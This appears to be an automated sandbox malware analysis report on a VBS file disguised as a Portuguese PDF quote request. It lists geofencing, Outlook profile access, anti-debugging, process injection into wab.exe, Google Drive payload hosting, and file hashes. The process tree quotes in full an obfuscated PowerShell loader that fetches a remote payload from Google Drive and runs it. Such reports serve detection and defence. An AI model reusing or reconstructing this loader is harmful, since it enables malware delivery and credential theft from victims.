Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
21/03/2024, 17:07
Static task
static1
Behavioral task
behavioral1
Sample
Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs
Resource
win10v2004-20240226-en
General
-
Target
Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs
-
Size
20KB
-
MD5
6c172c78edfa9cf3fbcee9e6417b4ec0
-
SHA1
56d554a6cfae0cbee45a32ac9e7f261c910cd046
-
SHA256
18a00a0da74be3d89a29bd856617a1703ee83646f39a51d70cf9d9017bd1ffad
-
SHA512
881216852a4049ce32387b221791b9ba7c75c4decb9b869430842a7a540f52ec1a24ae9a41550e0feb0dcf58731dcdd2dda9bcd45c798e0403af0fefaa751c27
-
SSDEEP
384:CE68ihBTZ6i8ahvxSIp27nn15lNmpK2kn70Vuz3+44GE8gT:H68ihdgi/LfIn3lNmpK2k7Sau4m8M
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 22 drive.google.com 26 drive.google.com 63 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 1088 wab.exe 1088 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4956 powershell.exe 1088 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4956 set thread context of 1088 4956 powershell.exe 115 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 3484 powershell.exe 3484 powershell.exe 3484 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4956 powershell.exe 4956 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3484 powershell.exe Token: SeDebugPrivilege 4956 powershell.exe Token: SeDebugPrivilege 1088 wab.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4824 wrote to memory of 3484 4824 WScript.exe 95 PID 4824 wrote to memory of 3484 4824 WScript.exe 95 PID 3484 wrote to memory of 2948 3484 powershell.exe 98 PID 3484 wrote to memory of 2948 3484 powershell.exe 98 PID 3484 wrote to memory of 4956 3484 powershell.exe 106 PID 3484 wrote to memory of 4956 3484 powershell.exe 106 PID 3484 wrote to memory of 4956 3484 powershell.exe 106 PID 4956 wrote to memory of 4216 4956 powershell.exe 110 PID 4956 wrote to memory of 4216 4956 powershell.exe 110 PID 4956 wrote to memory of 4216 4956 powershell.exe 110 PID 4956 wrote to memory of 2568 4956 powershell.exe 114 PID 4956 wrote to memory of 2568 4956 powershell.exe 114 PID 4956 wrote to memory of 2568 4956 powershell.exe 114 PID 4956 wrote to memory of 1088 4956 powershell.exe 115 PID 4956 wrote to memory of 1088 4956 powershell.exe 115 PID 4956 wrote to memory of 1088 4956 powershell.exe 115 PID 4956 wrote to memory of 1088 4956 powershell.exe 115 PID 4956 wrote to memory of 1088 4956 powershell.exe 115 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Adgangsbegrnsnings Festoonery Overmost Inned Bondeknolde slaggebetonen #>;$Shunterne=(cmd /c set /A 115^^0);Function Rebribe ([String]$Snvreres){$Shunterne=[char][int]$Shunterne;$Exemplificational=$Shunterne+'ubstring';$Subpoenas=8;$Aromatiser=Audiles($Snvreres);For($Sagginess=7; $Sagginess -lt $Aromatiser; $Sagginess+=$Subpoenas){$Inrunning=$Snvreres.$Exemplificational.Invoke($Sagginess, 1);$Airbuses=$Airbuses+$Inrunning;}$Airbuses;}function Unscouring ($Descendent){. ($Phanerophyte) ($Descendent);}function Audiles ([String]$Kvindesynenes){$Stvstormene=$Kvindesynenes.Length-1;$Stvstormene;}$Bryanite=Rebribe 'GovernmTTilve erStagedmam disten MarginskubistefVllingseVandlbsrFerrihyr Bu,zeeiVandfornSuper,lgProfess ';$Twitchfire=Rebribe 'Sur,acthFlybooktE.tingutFis eripgranulisMicrolu: alaeot/Submax / Flle.kdFlygtn rBedeafpi Dor.thvTewlybleWobblyb.TvtninggVerdslio TidobloBlanktegBoks.bolDrukneteBefolkn.BrshandcGemytteo HairbamEtageby/ yrstehuDydspr,c Softba?ExcisioeFr.mhvexlubberlpEnliefsoDyknde.r,undayptSkattek=OvertrddCursthooNaturskwBejl.rtnlettermlBiradiaoKontoraaMajoritdSpil.ev&Bkkenfoi adver,dSeptem,=posn,rp1,nerler6 Wholese.atocri_churchwaDkketalPGraaligdAnnoncehF,rnticY Checkr1WhallocfskviserI ProfitNdejligtz MaattecPast amvCalpurndGinslinhUncathozOmstndee TheomadSilhu,tXnonvacuy Perfec2 Trustbuh.gmollYRepulsi6TringenmE iminaSTerm.nuP PromusrP.rotidWBioassaZFlannel ';$Phanerophyte=Rebribe 'OvermigiCentriseOutissuxFontane ';$Laureateships=Rebribe 'Fecundi$HydrospgPsil,selMoraviaoLrestnibGenlsunaSmigr,rlVer abi:LymphoiKshuddereOdelstinOphthaldBuffedetSpeak,te Ddsboe Anledn,=Microsc KaleyarSMenorrhtturpethaHeterolr sephirtMrtelv.-Ballfi.B Smokili AnsvartC,aracisSelvbioTChannelrnonimpeaUnconson Tel.trsFascinaf Rum.eneMonophor Stigm Bryll -PensionS P.openoRat kseu flytbrskrfe scGlyceroeResurfa Opinion$AfterfrTParafrawTripalmiShieldbtGall unc wastewhVasor ff ,ystemiF,refinrFlopslaeAfskyen C okery- DomsudDReflecte Climats SkosnutAmylcoui Bi,tannFinmekaaUntr.sttAttribriGowdnooo ErgotinLagerad Hit,anr$svrdsidU uitaren Insoc eIn,brinxWrithe tEksekutrEnam eraNa,rvaeomajon,er MalknidNervatiiwinegronTekstilaWarmersrImmanenyGiglots ';Unscouring (Rebribe ' B rrer$N,reocyg Lourd lStoppaboSpookinbFredso,a cosmoplbackfis:BafflemURetrodanBehovsueOphthalxOrdningtQa idamrSkinnebaLydredioStationrPolygamdAceto ui Aho,nsnSv,nglaa SimultrLedde.syroopbob= Takedo$SperonaePrecipinD.eriyov Padash: TawgikaSki,reepVaskepupKodificdVvskultaConvergtStrrelsa.emonet ') ;Unscouring (Rebribe 'nednormIpulpitimmacrocepCeral,ro irehnrindrejstSte han-Jack,olMUn ffraoSnorelodAustralufretfullIor opae Redecl ZarsvetB Ga,deniSculkintFupperns ,osereTRegaugircommuniaWarningnWommeras AllotyfStepnineUneffacrnonpro. ') ;$Unextraordinary=$Unextraordinary+'\Postmodernismen.Dis' ;Unscouring (Rebribe 'Syn ary$Ble eplg frumpilDe,lexio Unquicb Caliv.aTopvinkl Sinkni: SpindpDKons.kvi,unhmetsMari,olkSnrlivef nderpriSkrmreflFiskeli=Fireaar( ConcubTOpbringe Misbe sPrecritt Kamufl-AfsnitsPCorrodyaProteset ThermihGrenen, Politis$FladpulUCatapuln phthaleNiveaufxStorhertRetsf rrClowty,aAntiksao estlagrAlternedContextiAt mizenD,clariaBrss inrBortaukyAllival) En,our ') ;while (-not $Diskfil) {Unscouring (Rebribe ' Al.aynI Rne,olf Nondis M.lieub(Murbrok$ Jom ruKThi.cyaeAt ogennU drenddDemesnitZagsagueBrygsov.tre,varJTri unioKainitebPaas,ebS Makho,tEnsandaa Tonn,stDvrg,ksePar.ren provoke-VaskulreSpitstiq,aadene S,erona$SignoraB HelsefrLazarocyMohmbira zoransnInterpiiThall.ptUr.stifeLeptopr) Modici Famulus{ PrimrkSRackwortPerceptaMultiturGammel t Morato- GrosseSDefecatlHandlepePrede ieMorm.nspBug.ene Deducer1Genglde}TranspiePretranlJuntowes ConvereCymbalo{O.fensiSMumiesit Quer sa BrugerrEmmeryptlymphat-AabentvSSmaabrnlMacrocleParaplaeHrdstubpD,nkort gallinu1Bibacio;FavnfulUVreel.nnTi.smags,kibsliccitatiooWoodlanuUdpenslrKlkedesi ExponenPseudo,gProsili Perc ss$ed maspL Halvfja UnwinduSalu,ter Stetose Aylessa CapsultFlumme eEvigeafsPer phehFrigresiAch,llipKato ess.tropha} Skaktp ');Unscouring (Rebribe 'Stabelv$EternisgUdenlanlWitchesoIndgnedbTe,foldaOejentrlOv.rnat:PaspoleD Un.ecoiMentorssFulgentkPro,enifUnconceiVentri lStt,esy=Spi.alt( photomT Tee ieeUdpegelsTrus futBredbaa-Fastho,P TunganaReform.tSkolepahMorinud Noncont$DgenigtU recentn EilerteisotrimxDolorsht DolichrFor.attasilke.ooReaktiorUinitiadSaftfuliD,schronPostcosaVet,rinrmirthfuybenzogl)Hinande ') ;}Unscouring (Rebribe ' ,armsd$CyaninsgKdebrkelApprestoForttnib Llingea,piritulJocasta:Lskbel,F Nonwaxo Uns,ncrIsoseisrDecimale.xpertitFursto,nBran.ekisemifunnHui,ilegSvrdfstsTffelhenAksonomaxeromyrvBemandinAfhstensPassere Rst.ner=Bent.ic Bari.eiGAssyrereForsrgetUnovert-Reab,orCVisualioUr.acidnClarititDatabase .udiolnSchleict Ehlers Campoo$Op,akniU Pletson BloknieBiovaskxArkfdertF,lernerInitiataGrundtaoDoublecr BeskridHotelisi M,soponAloe ora.yjamaer Keba,sy Antipo ');Unscouring (Rebribe 'Tornebu$bogka ngTorturklAngola,o BrokfubOvergreaIterdrilImmig a:SumpbveFVelopmea pavonesSemi.rotAk,demil.oazervaHulmurseT.kredsgS bdruigTenpenceTraumatlTegnes,s Con.ige Co.sue Parring=Trkbasu ornatfo[Me iturS MiljfoyP nonces Indv itMischoseF.skemem ,landb.NormereCRooferso StyninnNonwrinvChinanteCinquefrBacteritB,trykk].undeck:Deponer:OedelaeFragtopsrOrdmello CheckhmF,skekuBRom,ossaStttepesR.ghthae snings6,isting4CiliussSTalliabt C.mengrPaleopsiSoftnern Uninteg Eutrop(Gascony$Datas iFL,venssoPiersarrImpersorsemisucebrenthjtEsk.drenKurve,eiMicroconEftervigUranbersHusarrenGadarenaHandelsvskaberen,alycansFritids) Pul.it ');Unscouring (Rebribe 'Arealer$Hyposcog Nonp,sl Sy.ehjoCartagebBarium a Afls,elJarbotf:DejklumVShopsskeJoshuahjB.ckersoPrsi.ervEgenhndeProaviarDecentrsAfbalankInstrukrChondroiamb.tionFie,dfigVen.ric Editore= Un.orr Rea to[ BjergnSv.siculy Windows.kvareltBe.gowneblokninmNonperc.ManslayTablative Dus efxcoranoctPornoma. Aa ekrE LinieanKvindesc PolyanoStrasbod.fskalliPhosphanAssurang andoo] Fungol:.yrilli: TredelA.ilbageSContrasCPsilotaI y.rerbISuspici.HudfletGKobberse Afsagtt Dine.eSHjlpemet F rkear UnderpiStaklesnGuarapog Skol,n(ned,mpe$VaselinFMegaloeaEncomicsIndogentArtificlZoolatraAfrmnineContempg TrotregtrencheeMaterialtetraiosSissieseAmtmanp) Bashjt ');Unscouring (Rebribe ' Selska$Dodec,hgFeriernl.ulfonaoUntransbTightkoaalabamil,pillen: VsentlUColludenMetacisdMegafoneStence.rFletfunfA.titheoJanisarr BeldamtExecutiiActivisflabor.eyUnchivai ngrebnFoss,tegUnretur=Epinici$KinetonV Contr,eBun,renjShinerroSomnilovDestille UnbarbrBevislisM.smerikBe,ismar VkstceiLeaklesn Tal engAntimec.PressrusAretalouForflgebBoghandsFeinschtBjrnetjr TabeloiAnbringnsubu,bagF.rjage(Steffan3Bactris3Conduce5Casefu 4.eshear7 Stregs8decimal,Plurilo3Baiki,c1 Overta6Cytostr7Planesh9 ,rille)Rheumat ');Unscouring $Underfortifying;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c set /A 115^^03⤵PID:2948
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Adgangsbegrnsnings Festoonery Overmost Inned Bondeknolde slaggebetonen #>;$Shunterne=(cmd /c set /A 115^^0);Function Rebribe ([String]$Snvreres){$Shunterne=[char][int]$Shunterne;$Exemplificational=$Shunterne+'ubstring';$Subpoenas=8;$Aromatiser=Audiles($Snvreres);For($Sagginess=7; $Sagginess -lt $Aromatiser; $Sagginess+=$Subpoenas){$Inrunning=$Snvreres.$Exemplificational.Invoke($Sagginess, 1);$Airbuses=$Airbuses+$Inrunning;}$Airbuses;}function Unscouring ($Descendent){. ($Phanerophyte) ($Descendent);}function Audiles ([String]$Kvindesynenes){$Stvstormene=$Kvindesynenes.Length-1;$Stvstormene;}$Bryanite=Rebribe 'GovernmTTilve erStagedmam disten MarginskubistefVllingseVandlbsrFerrihyr Bu,zeeiVandfornSuper,lgProfess ';$Twitchfire=Rebribe 'Sur,acthFlybooktE.tingutFis eripgranulisMicrolu: alaeot/Submax / Flle.kdFlygtn rBedeafpi Dor.thvTewlybleWobblyb.TvtninggVerdslio TidobloBlanktegBoks.bolDrukneteBefolkn.BrshandcGemytteo HairbamEtageby/ yrstehuDydspr,c Softba?ExcisioeFr.mhvexlubberlpEnliefsoDyknde.r,undayptSkattek=OvertrddCursthooNaturskwBejl.rtnlettermlBiradiaoKontoraaMajoritdSpil.ev&Bkkenfoi adver,dSeptem,=posn,rp1,nerler6 Wholese.atocri_churchwaDkketalPGraaligdAnnoncehF,rnticY Checkr1WhallocfskviserI ProfitNdejligtz MaattecPast amvCalpurndGinslinhUncathozOmstndee TheomadSilhu,tXnonvacuy Perfec2 Trustbuh.gmollYRepulsi6TringenmE iminaSTerm.nuP PromusrP.rotidWBioassaZFlannel ';$Phanerophyte=Rebribe 'OvermigiCentriseOutissuxFontane ';$Laureateships=Rebribe 'Fecundi$HydrospgPsil,selMoraviaoLrestnibGenlsunaSmigr,rlVer abi:LymphoiKshuddereOdelstinOphthaldBuffedetSpeak,te Ddsboe Anledn,=Microsc KaleyarSMenorrhtturpethaHeterolr sephirtMrtelv.-Ballfi.B Smokili AnsvartC,aracisSelvbioTChannelrnonimpeaUnconson Tel.trsFascinaf Rum.eneMonophor Stigm Bryll -PensionS P.openoRat kseu flytbrskrfe scGlyceroeResurfa Opinion$AfterfrTParafrawTripalmiShieldbtGall unc wastewhVasor ff ,ystemiF,refinrFlopslaeAfskyen C okery- DomsudDReflecte Climats SkosnutAmylcoui Bi,tannFinmekaaUntr.sttAttribriGowdnooo ErgotinLagerad Hit,anr$svrdsidU uitaren Insoc eIn,brinxWrithe tEksekutrEnam eraNa,rvaeomajon,er MalknidNervatiiwinegronTekstilaWarmersrImmanenyGiglots ';Unscouring (Rebribe ' B rrer$N,reocyg Lourd lStoppaboSpookinbFredso,a cosmoplbackfis:BafflemURetrodanBehovsueOphthalxOrdningtQa idamrSkinnebaLydredioStationrPolygamdAceto ui Aho,nsnSv,nglaa SimultrLedde.syroopbob= Takedo$SperonaePrecipinD.eriyov Padash: TawgikaSki,reepVaskepupKodificdVvskultaConvergtStrrelsa.emonet ') ;Unscouring (Rebribe 'nednormIpulpitimmacrocepCeral,ro irehnrindrejstSte han-Jack,olMUn ffraoSnorelodAustralufretfullIor opae Redecl ZarsvetB Ga,deniSculkintFupperns ,osereTRegaugircommuniaWarningnWommeras AllotyfStepnineUneffacrnonpro. ') ;$Unextraordinary=$Unextraordinary+'\Postmodernismen.Dis' ;Unscouring (Rebribe 'Syn ary$Ble eplg frumpilDe,lexio Unquicb Caliv.aTopvinkl Sinkni: SpindpDKons.kvi,unhmetsMari,olkSnrlivef nderpriSkrmreflFiskeli=Fireaar( ConcubTOpbringe Misbe sPrecritt Kamufl-AfsnitsPCorrodyaProteset ThermihGrenen, Politis$FladpulUCatapuln phthaleNiveaufxStorhertRetsf rrClowty,aAntiksao estlagrAlternedContextiAt mizenD,clariaBrss inrBortaukyAllival) En,our ') ;while (-not $Diskfil) {Unscouring (Rebribe ' Al.aynI Rne,olf Nondis M.lieub(Murbrok$ Jom ruKThi.cyaeAt ogennU drenddDemesnitZagsagueBrygsov.tre,varJTri unioKainitebPaas,ebS Makho,tEnsandaa Tonn,stDvrg,ksePar.ren provoke-VaskulreSpitstiq,aadene S,erona$SignoraB HelsefrLazarocyMohmbira zoransnInterpiiThall.ptUr.stifeLeptopr) Modici Famulus{ PrimrkSRackwortPerceptaMultiturGammel t Morato- GrosseSDefecatlHandlepePrede ieMorm.nspBug.ene Deducer1Genglde}TranspiePretranlJuntowes ConvereCymbalo{O.fensiSMumiesit Quer sa BrugerrEmmeryptlymphat-AabentvSSmaabrnlMacrocleParaplaeHrdstubpD,nkort gallinu1Bibacio;FavnfulUVreel.nnTi.smags,kibsliccitatiooWoodlanuUdpenslrKlkedesi ExponenPseudo,gProsili Perc ss$ed maspL Halvfja UnwinduSalu,ter Stetose Aylessa CapsultFlumme eEvigeafsPer phehFrigresiAch,llipKato ess.tropha} Skaktp ');Unscouring (Rebribe 'Stabelv$EternisgUdenlanlWitchesoIndgnedbTe,foldaOejentrlOv.rnat:PaspoleD Un.ecoiMentorssFulgentkPro,enifUnconceiVentri lStt,esy=Spi.alt( photomT Tee ieeUdpegelsTrus futBredbaa-Fastho,P TunganaReform.tSkolepahMorinud Noncont$DgenigtU recentn EilerteisotrimxDolorsht DolichrFor.attasilke.ooReaktiorUinitiadSaftfuliD,schronPostcosaVet,rinrmirthfuybenzogl)Hinande ') ;}Unscouring (Rebribe ' ,armsd$CyaninsgKdebrkelApprestoForttnib Llingea,piritulJocasta:Lskbel,F Nonwaxo Uns,ncrIsoseisrDecimale.xpertitFursto,nBran.ekisemifunnHui,ilegSvrdfstsTffelhenAksonomaxeromyrvBemandinAfhstensPassere Rst.ner=Bent.ic Bari.eiGAssyrereForsrgetUnovert-Reab,orCVisualioUr.acidnClarititDatabase .udiolnSchleict Ehlers Campoo$Op,akniU Pletson BloknieBiovaskxArkfdertF,lernerInitiataGrundtaoDoublecr BeskridHotelisi M,soponAloe ora.yjamaer Keba,sy Antipo ');Unscouring (Rebribe 'Tornebu$bogka ngTorturklAngola,o BrokfubOvergreaIterdrilImmig a:SumpbveFVelopmea pavonesSemi.rotAk,demil.oazervaHulmurseT.kredsgS bdruigTenpenceTraumatlTegnes,s Con.ige Co.sue Parring=Trkbasu ornatfo[Me iturS MiljfoyP nonces Indv itMischoseF.skemem ,landb.NormereCRooferso StyninnNonwrinvChinanteCinquefrBacteritB,trykk].undeck:Deponer:OedelaeFragtopsrOrdmello CheckhmF,skekuBRom,ossaStttepesR.ghthae snings6,isting4CiliussSTalliabt C.mengrPaleopsiSoftnern Uninteg Eutrop(Gascony$Datas iFL,venssoPiersarrImpersorsemisucebrenthjtEsk.drenKurve,eiMicroconEftervigUranbersHusarrenGadarenaHandelsvskaberen,alycansFritids) Pul.it ');Unscouring (Rebribe 'Arealer$Hyposcog Nonp,sl Sy.ehjoCartagebBarium a Afls,elJarbotf:DejklumVShopsskeJoshuahjB.ckersoPrsi.ervEgenhndeProaviarDecentrsAfbalankInstrukrChondroiamb.tionFie,dfigVen.ric Editore= Un.orr Rea to[ BjergnSv.siculy Windows.kvareltBe.gowneblokninmNonperc.ManslayTablative Dus efxcoranoctPornoma. Aa ekrE LinieanKvindesc PolyanoStrasbod.fskalliPhosphanAssurang andoo] Fungol:.yrilli: TredelA.ilbageSContrasCPsilotaI y.rerbISuspici.HudfletGKobberse Afsagtt Dine.eSHjlpemet F rkear UnderpiStaklesnGuarapog Skol,n(ned,mpe$VaselinFMegaloeaEncomicsIndogentArtificlZoolatraAfrmnineContempg TrotregtrencheeMaterialtetraiosSissieseAmtmanp) Bashjt ');Unscouring (Rebribe ' Selska$Dodec,hgFeriernl.ulfonaoUntransbTightkoaalabamil,pillen: VsentlUColludenMetacisdMegafoneStence.rFletfunfA.titheoJanisarr BeldamtExecutiiActivisflabor.eyUnchivai ngrebnFoss,tegUnretur=Epinici$KinetonV Contr,eBun,renjShinerroSomnilovDestille UnbarbrBevislisM.smerikBe,ismar VkstceiLeaklesn Tal engAntimec.PressrusAretalouForflgebBoghandsFeinschtBjrnetjr TabeloiAnbringnsubu,bagF.rjage(Steffan3Bactris3Conduce5Casefu 4.eshear7 Stregs8decimal,Plurilo3Baiki,c1 Overta6Cytostr7Planesh9 ,rille)Rheumat ');Unscouring $Underfortifying;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c set /A 115^^04⤵PID:4216
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵PID:2568
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1088
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3180 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:81⤵PID:3908
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD59f0edd78a6aaca110c79013771d6001a
SHA15b96b41d1881dab66b4379cf0ada08ff0bbbd834
SHA256611b8b6bca22e3a5244ddfbd691a0ae85134682397b60bf0cf3b0a7eb7fa8eae
SHA5124bb07b481f5dbba051aa97b08c107b2cef894d2d672bcbbef95159d31cf776663db1026f0cccbe2ef3532841b83a48966a70a15576cabdb4821a8d6cb5fd9608
-
Filesize
4KB
MD55c70ac32cd66791376b62c77311b502f
SHA1de76395b2e4dc43d7de2c2b16d6c2fc708877379
SHA256d76f34448ff1872b89bf50073022ff97fe0727b0edf8fe2532c5a62a99fa2cdf
SHA5121467790a710fef3c26ba806e225cea1183ab85ece56c9a2e29c3490bde7888d5bd6fd1630108b99e379f0f23f29e0ba1d78e1dcedb5e6d73c73e8e09e4cabfa2
-
Filesize
1KB
MD5bd20ec18e46ec8314987aaada98f10fd
SHA18f51d5e778fc71bafdde641b75f398e39eecc62a
SHA25664cbcd3e70eb4b7f448c05342a3a7c9ce1dcf240d9d04b32a48fda0373c221f9
SHA5128a5002870a7b1169ba2ea8395a5c5ca395967594f196150c7bc9a2734ebcd89d8e2d6907b4358d404d431950bc87c5baba150c2448e3a260ed753b9e25f5b170
-
Filesize
1KB
MD58f730c551500d56834bbf653c4967bfa
SHA1743ced63ecf36448118864ebb17326215c39a47c
SHA25670054f0aa395f386ba7751641347c2cb5e5f730769139691324ede08b5e0792f
SHA5127f74b3322094bad9ad169608679c299f91c4b0cafcd503d21994b8a3b1027db1994997aa0ddcee56e70a4169434c473dd3cbd7ebbc485b37de465f7799bf9ade
-
Filesize
3KB
MD53a77b94591bc1515432be570e46a0e8c
SHA14abaf647d3adcd56bc7247e272b7d80dfba74dcf
SHA256904c10020cd2ed4c085f02c125fa373f693454dce4bc7015a0bca543cdf9459d
SHA5129bf2e8a1638283ffc19e75d4f669e734ca90de46890c38a3e28390a2ac1b8bc1cdc55c18236f5728d962dacd4fe079e31ebdc22d1f69dc8267fc6d7d7d699867
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82